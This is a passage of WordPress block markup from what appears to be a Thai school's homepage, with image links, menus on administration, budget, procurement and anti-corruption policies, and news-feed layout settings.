src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a 